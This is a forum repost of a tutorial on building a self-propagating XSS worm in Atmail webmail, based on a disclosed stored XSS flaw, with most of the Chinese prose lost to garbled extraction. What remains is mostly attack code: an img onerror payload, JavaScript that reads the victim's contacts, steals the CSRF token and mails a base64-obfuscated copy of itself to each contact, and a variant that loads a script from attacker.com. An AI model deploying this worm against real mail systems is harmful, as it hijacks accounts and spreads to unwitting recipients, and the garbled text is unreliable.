搜索

[13514] 2018-12-09_手把手教你如何在Atmail上构建XSS蠕虫

文档创建者:s7ckTeam
浏览次数:33
最后更新:2025-01-18
2018-12-09_手把手教你如何在Atmail上构建XSS蠕虫 A t m a i l X S S A l p h a _ h 4 c k   F r e e B u f   2 0 1 8 - 1 2 - 0 9 A t m a i l I S P 使 使 A t m a i l D r e a m H o s t L e g a l S h i e l d   ( ) m : t e l ( ) i i N e t O p t u s   ( ) D r e a m H o s t A t m a i l X S S W e b 便 P a y l o a d X S S X S S 2 0 0 5 M y S p a c e 2 0 1 4   T w e e t D e c k X S S   P a y l o a d X S S P a y l o a d 使 F i r e f o x X S S   P a y l o a d W e b D O M c a t   c o n t e n t   |   m a i l   - a   " C o n t e n t - t y p e :   t e x t / h t m l "   - s   " t e s t "   v i c t i m 1 @ z j u l i a n . c o m
X S S   P a y l o a d A t m a i l X S S   P a y l o a d H T M L 使 X S S   P a y l o a d X S S A t m a i l 使 便 P a y l o a d A t m a i l P a y l o a d A t m a i l A t m a i l H T M L A t m a i l s r c a l t l o n g d e s c s t y l e h e i g h t w i d t h A t m a i l o n e r r o r s r c o n e r r o r 使 A t m a i l W e b X S S P a y l o a d J a v a S c r i p t 1   2   A t m a i l C S R F 3   X S S   P a y l o a d U R L < i m g   l o n g d e s c = " s r c = ' x ' o n e r r o r = a l e r t ( d o c u m e n t . d o m a i n ) ; / / > < i m g   " s r c = ' s h o w m e ' > < i m g   l o n g d e s c = " > / / H T T P   r e q u e s t   t o   g r a b   v i c t i m ' s   c o n t a c t s x m l H t t p = n e w X M L H t t p R e q u e s t ( ) ; x m l H t t p . o p e n ( ' G E T ' , ' / i n d e x . p h p / m a i l / c o n t a c t s / v i e w c o n t a c t s / G r o u p I D / 0 ' , f a l s e ) ; x m l H t t p . s e n d ( n u l l ) ; r e s p o n s e = x m l H t t p . r e s p o n s e T e x t ;   / / E x t r a c t   e m a i l   a d d r e s s e s   a n d   f i l t e r   d u p l i c a t e s v a r   e x t r a c t e d e m a i l s   =   r e s p o n s e . m a t c h ( / [ A - Z 0 - 9 . _ % + - ] + @ [ A - Z 0 - 9 . - ] + . [ A - Z ] { 2 , 4 } / i g m ) ; v a r   u n i q u e e m a i l s   =   [ ] ;   f o r ( v a r i   =   0 ;   i   <   e x t r a c t e d e m a i l s . l e n g t h ;   i + + ) { i f ( u n i q u e e m a i l s . i n d e x O f ( e x t r a c t e d e m a i l s [ i ] )   = =   - 1 ) u n i q u e e m a i l s . p u s h ( e x t r a c t e d e m a i l s [ i ] ) ; }   / / H T T P   r e q u e s t   t o   g e t   C S R F   t o k e n x m l H t t p . o p e n ( ' G E T ' , ' / i n d e x . p h p / m a i l / c o n t a c t s ' , f a l s e ) ; x m l H t t p . s e n d ( n u l l ) ; r e s p o n s e 2 = x m l H t t p . r e s p o n s e T e x t ; v a r   c s r f t o k e n   =   r e s p o n s e 2 . m a t c h ( / n a m e = " a t m a i l C S R F " v a l u e = " ( . + ? ) " / i m ) ;   / / L o o p   t h r o u g h   c o n t a c t s   a n d   s e n d   e m a i l f o r ( v a r   i   =   0 ;   i   <   u n i q u e e m a i l s . l e n g t h ;   i + + )   {               x m l H t t p . o p e n ( ' P O S T ' , ' / i n d e x . p h p / m a i l / c o m p o s e m e s s a g e / s e n d ' , f a l s e ) ;               v a r   p a r a m s   =   ' a t m a i l C S R F = '   +   c s r f t o k e n [ 1 ] +   ' & e m a i l T o = '   +   u n i q u e [ i ]   + ' & e m a i l S u b j e c t = o p e n % 2 0 m e & e m a i l B o d y H t m l = % 3 c % 6 8 % 3 3 % 3 e % 6 1 % 7 4 % 6 d % 6 1 % 6 9 % 6 c % 2 0 % 6 5 % 6 d % 6 1 % 6 9 % 6 c % 2 0 % 5 8 % 5 3 % 5 3 % 2 0 % 7 7 % 6 f % 7 2 % 6 d % 3 c % 2 f % 6 8 % 3 3 % 3 e % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 2 0 % 0 a % 3 c % 6 9 % 6 d % 6 7 % 2 0 % 6 c % 6 f % 6 e % 6 7 % 6 4 % 6 5 % 7 3 % 6 3 % 3 d % 2 2 % 7 3 % 7 2 % 6 3 % 3 d % 2 7 % 7 8 % 2 7 % 6 f % 6 e % 6 5 % 7 2 % 7 2 % 6 f % 7 2 % 3 d % 6 5 % 7 6 % 6 1 % 6 c % 2 8 % 7 7 % 6 9 % 6 e % 6 4 % 6 f % 7 7 % 2 e % 6 1 % 7 4 % 6 f % 6 2 % 2 8 % 2 7 % 6 1 % 5 7 % 3 5 % 6 a % 6 2 % 4 8 % 5 6 % 6 b % 5 a % 5 4 % 3 1 % 6 b % 6 2 % 3 2 % 4 e % 3 1 % 6 2 % 5 7 % 5 6 % 7 5 % 6 4 % 4 3 % 3 5 % 6 a % 6 3 % 6 d % 5 6 % 6 8 % 6 4 % 4 7 % 5 6 % 4 6 % 6 2 % 4 7 % 5 6 % 7 4 % 5 a % 5 7 % 3 5 % 3 0 % 4 b % 4 3 % 6 4 % 7 a % 5 9 % 3 3 % 4 a % 7 0 % 6 3 % 4 8 % 5 1 % 6 e % 4 b % 5 4 % 7 4 % 7 0 % 6 2 % 6 d % 4 e % 7 3 % 6 4 % 5 7 % 5 2 % 6 c % 4 c % 6 e % 4 e % 7 9 % 5 9 % 7 a % 3 0 % 6 e % 6 1 % 4 8 % 5 2 % 3 0 % 6 3 % 4 8 % 4 d % 3 6 % 4 c % 7 9 % 3 9 % 6 8 % 6 4 % 4 8 % 5 2 % 6 8 % 5 9 % 3 2 % 7 4 % 6 c % 6 3 % 6 9 % 3 5 % 6 a % 6 2 % 3 2 % 3 0 % 7 6 % 5 9 % 5 8 % 5 2 % 7 4 % 5 9 % 5 7 % 6 c % 7 3 % 4 c % 6 d % 7 0 % 7 a % 4 a % 7 a % 7 4 % 6 b % 6 2 % 3 2 % 4 e % 3 1 % 6 2 % 5 7 % 5 6 % 7 5 % 6 4 % 4 3 % 3 5 % 6 f % 5 a % 5 7 % 4 6 % 6 b % 4 c % 6 d % 4 6 % 7 7 % 6 3 % 4 7 % 5 6 % 7 5 % 5 a % 4 5 % 4 e % 6 f % 6 1 % 5 7 % 7 8 % 6 b % 4 b % 4 7 % 6 c % 7 5 % 5 9 % 3 2 % 7 8 % 3 1 % 5 a % 4 7 % 5 5 % 7 0 % 4 f % 7 7 % 3 d % 3 d % 2 7 % 2 9 % 2 9 % 3 b % 2 f % 2 f % 3 e % 3 c % 6 9 % 6 d % 6 7 % 2 0 % 2 2 % 2 0 % 7 3 % 7 2 % 6 3 % 3 d % 2 7 % 7 3 % 6 8 % 6 f % 7 7 % 6 d % 6 5 % 2 7 % 3 e ' ;               x m l H t t p . s e t R e q u e s t H e a d e r ( ' C o n t e n t - t y p e ' , ' a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ' ) ;               x m l H t t p . s e n d ( p a r a m s ) ;
B a s e 6 4 X S S   P a y l o a d o n e r r o r 使 e v a l ( a t o b ( ) ) P a y l o a d A t m a i l B a s e 6 4 9 4 5 X S S   P a y l o a d P a y l o a d < s c r i p t > J a v a S c r i p t B a s e 6 4 A t m a i l X S S h t t p s : / / w w w . b i s h o p f o x . c o m / n e w s / 2 0 1 7 / 0 6 / a t m a i l - 7 - s t o r e d - x s s - v u l n e r a b i l i t y / * b i s h o p f o x F B A l p h a _ h 4 c k F r e e B u f . C O M < i m g   l o n g d e s c = "   x s s / s r c = ' x ' o n e r r o r = e v a l ( w i n d o w . a t o b ( ' e G g 9 b m V 3 I F h N T E h 0 d H B S o m i t t e d   f o r b r e v i t y ' ) ) ; / / > < i m g   "   s r c = ' s h o w m e ' > o n e r r o r = " i n c l u d e = d o c u m e n t . c r e a t e E l e m e n t ( ' s c r i p t ' ) ; i n c l u d e . s r c = ' h t t p s : / / a t t a c k e r . c o m / a t m a i l . j s ' ; d o c u m e n t . h e a d . a p p e n d C h i l d ( i n c l u d e ) ; " o n e r r o r = " i n c l u d e = d o c u m e n t . c r e a t e E l e m e n t ( ' s c r i p t ' ) ; i n c l u d e . s r c = ' h t t p s : / / a t t a c k e r . c o m / a t m a i l . j s ' ; d o c u m e n t . h e a d . a p p e n d C h i l d ( i n c l u d e ) ; " < i m g   >

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理